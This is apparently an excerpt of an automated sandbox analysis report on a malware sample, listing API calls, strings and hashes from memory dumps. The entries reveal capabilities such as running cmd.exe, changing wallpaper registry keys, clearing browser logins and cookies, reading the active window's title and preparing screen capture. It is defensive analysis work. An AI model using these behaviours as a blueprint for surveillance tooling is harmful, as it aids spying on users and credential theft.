• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
Uniqueness

Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 1568E833
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-1866435925
Uniqueness

Uniqueness Score: -1.00%

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 1568DFB1
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 1568DFF0
  • Part of subcall function 156B5640: _Yarn.LIBCPMT ref: 156B565F
  • Part of subcall function 156B5640: _Yarn.LIBCPMT ref: 156B5683
• __CxxThrowException@8.LIBVCRUNTIME ref: 1568E016
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,156E611C), ref: 1569377E
• RegSetValueExA.ADVAPI32(156E611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,1569CAB1,WallpaperStyle,156E611C,00000001,156F4EE0,00000000), ref: 156937A6
• RegCloseKey.ADVAPI32(156E611C,?,?,1569CAB1,WallpaperStyle,156E611C,00000001,156F4EE0,00000000,?,1568875D,00000001), ref: 156937B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: Control Panel\Desktop
• API String ID: 1818849710-27424756
Uniqueness

Uniqueness Score: -1.00%

APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 15696130
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02DF7A09
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF7A0F
Strings
• NtProtectVirtualMemory, xrefs: 02DF79FF
• C:\Windows\System32\ntdll.dll, xrefs: 02DF7A04
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
• API String ID: 1646373207-1386159242
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,02E0A10B,00000000,02E0A11E), ref: 02DEC436
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02DEC447
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
                                                                                                                                                    • Opcode ID: b80098521ab533c8cd81a4fd5a37a020d06b3fc36323fa0b91c289b3ee496a1e
                                                                                                                                                    • Instruction ID: 095b2b6e6eaf3bd152781196425f5b0373947e2b22e57085237e18ecbdc853f5
• Instruction Fuzzy Hash: 39D05EA0AE03454EFF00BBB274C063933D8EB24719F80882EE00355308D672DC948FB8
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
• Instruction ID: 486e3574ad1a64c7950ca964cb3fc297caa40b76f4ccaa8d1c096c4083505dd6
• Instruction Fuzzy Hash: BFA17831E043969FD721CF68C890BAEBBE1FF11314F1841EDD9869B681C2B9A981C7D0
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 8c0b663fff8bacc42c97b035440320a0cdf88d4e5f9e7cd5be68a7707df8661c
• Instruction ID: 92abea83fb4ae8faff396f228fdb4e9832d89d138348399cb7fc3db86e4b379c
• Instruction Fuzzy Hash: 0D415B35F05328ABDB209BB8DC40BAEBBA8EF06370F100A59F464D6590DA74BC00C7E5
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d017d3dd502e7e05423b16404ed333bcfd3c407fba943d06a8ef22091586fd9a
• Instruction ID: e576cdb1696b39047fdfd9a452d994ee55c23957199f4729eff9e12f9ad96c80
• Instruction Fuzzy Hash: F5412676B01344AFD324CF78CC40B5ABBA9EB88710F1046AAE599DB690D6B1B545C7C4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,156F4F50), ref: 15684DB3
• CreateThread.KERNEL32(00000000,00000000,?,156F4EF8,00000000,00000000), ref: 15684DC7
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 15684DD2
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 15684DDB
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
• Opcode ID: 346e7dbc1872fec2f7358f5503e7aa6296877007cf602e93a4f65b5f89311bd6
• Instruction ID: 2e6eb547ff788bb0c99b064f7d282c6cdd16d693598ab622af1203bfbc21d7d8
• Instruction Fuzzy Hash: FF417C7560A305AFC714EB61CC54DAFB7EDAF94315F400A1DF89292290EB30B909C7A6
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DEE253
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DEE26F
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DEE2E6
• VariantClear.OLEAUT32(?), ref: 02DEE30F
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ArraySafe$Bound$ClearIndexVariant
• String ID:
• API String ID: 920484758-0
• Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction ID: 3d5960d3bd1d26fcfbe2163c765912ba061e2faa9a011305a225b52bedb3d264
• Instruction Fuzzy Hash: 7A41D975A016199FCF62EF58C890BD9B3BEEB49214F0081D5E54AA7351DB31AF818F60
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
• Cleared browsers logins and cookies., xrefs: 1568C0F5
• [Cleared browsers logins and cookies.], xrefs: 1568C0E4
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
• Opcode ID: f06926f4538bd831a90817749b5347aa5db7046b6a6308503b4e45caf31dbf3b
• Instruction ID: 4597aec4b666cc399cfa6e1897e2ebad1bf83205ad83b59cd4694dc544f941ac
• Instruction Fuzzy Hash: DD31E40871E3C16EE6019BB49860BEE7F835E93198F48455DE8C61FA86C9136408DBE7
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DEAD15
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DEAD39
• GetModuleFileNameA.KERNEL32(02DE0000,?,00000105), ref: 02DEAD54
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DEADEA
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: a0b5253325c81fab5917128eca25ec4d717e19c025ce809f51d5d3de2c4f68eb
• Instruction ID: b72c235fb554fd843e2d67c007e136ce88a580b1b5e76d79e548e17cc281139f
• Instruction Fuzzy Hash: CE410471A402599BDF21EB68CC84BDEB7EDAB18301F4040E9A549E7351EB74AF848F60
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DEAD15
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DEAD39
• GetModuleFileNameA.KERNEL32(02DE0000,?,00000105), ref: 02DEAD54
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DEADEA
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: 98bcbb23370561aed06ea43194a7d3d11b3ac99b16cf4960414869425e727aa1
• Instruction ID: 42cfcc2694986ddcf52b6add10dade462ef6772ebd2359000a9b8a3599550498
                                                                                                                                                    • Opcode Fuzzy Hash: 98bcbb23370561aed06ea43194a7d3d11b3ac99b16cf4960414869425e727aa1
                                                                                                                                                    • Instruction Fuzzy Hash: E3410671A402599BDF21EB68CC84BDEB7EDEB18341F4040E9A549E7351EB749F848F60
                                                                                                                                                    Uniqueness

Uniqueness Score: -1.00%

APIs
• EnumDisplayMonitors.USER32(00000000,00000000,156995CF,00000000), ref: 156994F5
• EnumDisplayDevicesW.USER32(?), ref: 15699525
• EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 1569959A
• EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 156995B7
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: DisplayEnum$Devices$Monitors
• String ID:
• API String ID: 1432082543-0
• Opcode ID: 7c88337633759b68f658d207f5706204d6e111c1760663b719dbfbe086658d9d
• Instruction ID: 81c3ebca114323ae936050d9f25bacb079a7da4fcfe08c7c29ed836c6ae6af43
• Opcode Fuzzy Hash: 7c88337633759b68f658d207f5706204d6e111c1760663b719dbfbe086658d9d
• Instruction Fuzzy Hash: 93218E72609354AFD324DA16DC88E9BBBECEBD1660F00052EF455C3150EF71AA09C6E6
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 1569C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1569C561
  • Part of subcall function 1569C551: GetWindowTextLengthW.USER32(00000000), ref: 1569C56A
  • Part of subcall function 1569C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 1569C594
• Sleep.KERNEL32(000001F4), ref: 1568A573
• Sleep.KERNEL32(00000064), ref: 1568A5FD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
• Opcode ID: 1e71089980d12b8c9724e2408aed87f0f7d1e59242fb91a4a482ba2521ea72e2
• Instruction ID: 70b81724cd290f78aed1019389133b7b0835f0105736218b882cd10272a50f51
• Opcode Fuzzy Hash: 1e71089980d12b8c9724e2408aed87f0f7d1e59242fb91a4a482ba2521ea72e2
• Instruction Fuzzy Hash: AB11CD357193009BC618FB74CC519AFB7A9AF51214F80051CE892925E0FF61BA58C7DB
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: SystemTimes$Sleep__aulldiv
• String ID:
• API String ID: 188215759-0
• Opcode ID: 27af12f927c82a88b14da247d4328f115cf0f179d04c3b846c580de8a24ea3f3
• Instruction ID: f8b385ef348e1f5162fd76a43ef2ba7f762002bf82cc54309840e975be380706
• Opcode Fuzzy Hash: 27af12f927c82a88b14da247d4328f115cf0f179d04c3b846c580de8a24ea3f3
• Instruction Fuzzy Hash: DD11637A6093456FD308EAB4CDC8DEB77ACAAC4250F440E29F54682050EE65B508C6A1
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,1568A74D), ref: 1568A6AB
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,1568A74D), ref: 1568A6BA
• Sleep.KERNEL32(00002710,?,?,?,1568A74D), ref: 1568A6E7
• CloseHandle.KERNEL32(00000000,?,?,?,1568A74D), ref: 1568A6EE
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID:
• API String ID: 1958988193-0
• Opcode ID: 70fffafb0795fcd22715ec4e006f83695e7cf79c97e74a78093c0c55c332b6fa
• Instruction ID: a61eba6641745f156a070160110f31c2d27ef907cf127fd30750fa1c971e8b53
• Opcode Fuzzy Hash: 70fffafb0795fcd22715ec4e006f83695e7cf79c97e74a78093c0c55c332b6fa
• Instruction Fuzzy Hash: F2110630B44754AEE721DA2488E4A1E3BAFBB45270F40040DEA8346985CBE17CD4C7E5
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,156C850D,?,00000000,00000000,00000000,?,156C8839,00000006,FlsSetValue), ref: 156C8598
• GetLastError.KERNEL32(?,156C850D,?,00000000,00000000,00000000,?,156C8839,00000006,FlsSetValue,156DF160,156DF168,00000000,00000364,?,156C82E7), ref: 156C85A4
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,156C850D,?,00000000,00000000,00000000,?,156C8839,00000006,FlsSetValue,156DF160,156DF168,00000000), ref: 156C85B2
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 5703900fd903e1813200cf8ac95604db6708292c4ab48a434da5601241d06ccd
• Instruction ID: cd0fdd90d2ec5e60ba971f7ddd7ccec1ca43b0c8c933ca600d2c077536c7fe8d
• Opcode Fuzzy Hash: 5703900fd903e1813200cf8ac95604db6708292c4ab48a434da5601241d06ccd
• Instruction Fuzzy Hash: 50012432B2623AABC7319A38CC94E477B9DFB05AB0B510A69FD05D3640DB60C800CAE0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C49E
• GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C4B2
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C4D7
• CloseHandle.KERNEL32(00000000,?,00000000,1568412F,156E5E74), ref: 1569C4E5
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
• Opcode ID: 804b48c37dd9985c73f6bc92efd8c59f5252b337b0b46532d7d8510dddb822c9
• Instruction ID: 832bb013b372c9bafff7ce10dc6cfcf924e2f50fd93edb63b82f8217d4dd7a0b
• Opcode Fuzzy Hash: 804b48c37dd9985c73f6bc92efd8c59f5252b337b0b46532d7d8510dddb822c9
• Instruction Fuzzy Hash: CAF049B53562287FF7245A25ECC4EBB379DEB86AB4F01062DFD42A2280CA255D05D1B1
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 156B987A
  • Part of subcall function 156B9EB2: ___AdjustPointer.LIBCMT ref: 156B9EFC
• _UnwindNestedFrames.LIBCMT ref: 156B9891
• ___FrameUnwindToState.LIBVCRUNTIME ref: 156B98A3
• CallCatchBlock.LIBVCRUNTIME ref: 156B98C7
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
• Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
• Instruction ID: e80968970739928ae46d80b2f44b165c620f327dc30586bb9c5ef492c2d9f05b
• Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
• Instruction Fuzzy Hash: B301E532601109BBCF029F55CC40EDA3BBAFF88754F018525F95866520D3B6F8A1EBE4
Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
• GetSystemMetrics.USER32(0000004C), ref: 156993F0 (0x4C = SM_XVIRTUALSCREEN)
• GetSystemMetrics.USER32(0000004D), ref: 156993F6 (0x4D = SM_YVIRTUALSCREEN)
• GetSystemMetrics.USER32(0000004E), ref: 156993FC (0x4E = SM_CXVIRTUALSCREEN)
• GetSystemMetrics.USER32(0000004F), ref: 15699402 (0x4F = SM_CYVIRTUALSCREEN; together these four calls return the bounding rectangle of the virtual desktop across all monitors, the values a screen-capture routine needs)
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                                    • Opcode ID: ce24e2a8fbb4aaf9d4973ababcd28d259fd21ae77be43eeefbad8d66f43a20a8
                                                                                                                                                    • Instruction ID: 05cb643056e60c921e35b0a8ce752d952123532012a5a9827509eb9103f26e30
                                                                                                                                                    • Opcode Fuzzy Hash: ce24e2a8fbb4aaf9d4973ababcd28d259fd21ae77be43eeefbad8d66f43a20a8
                                                                                                                                                    • Instruction Fuzzy Hash: 18F0AFA1F013164FD349DA758890A2F6BD9AFC5560F10093EE6088B280EFB5EC05CBC1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 156B8F31
                                                                                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 156B8F36
                                                                                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 156B8F3B
                                                                                                                                                      • Part of subcall function 156BA43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 156BA44B
                                                                                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 156B8F50
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1761009282-0
                                                                                                                                                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                    • Instruction ID: 172d40622f1ab1578935e59e176b56ee8f32b46b57e8d95821f7f13fe34566be
                                                                                                                                                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                    • Instruction Fuzzy Hash: 97C04C1CB032C29D1C5066B0221469D034B2DA22C6BC456D5899097A038AC6300BD7FF
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 156C2CED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
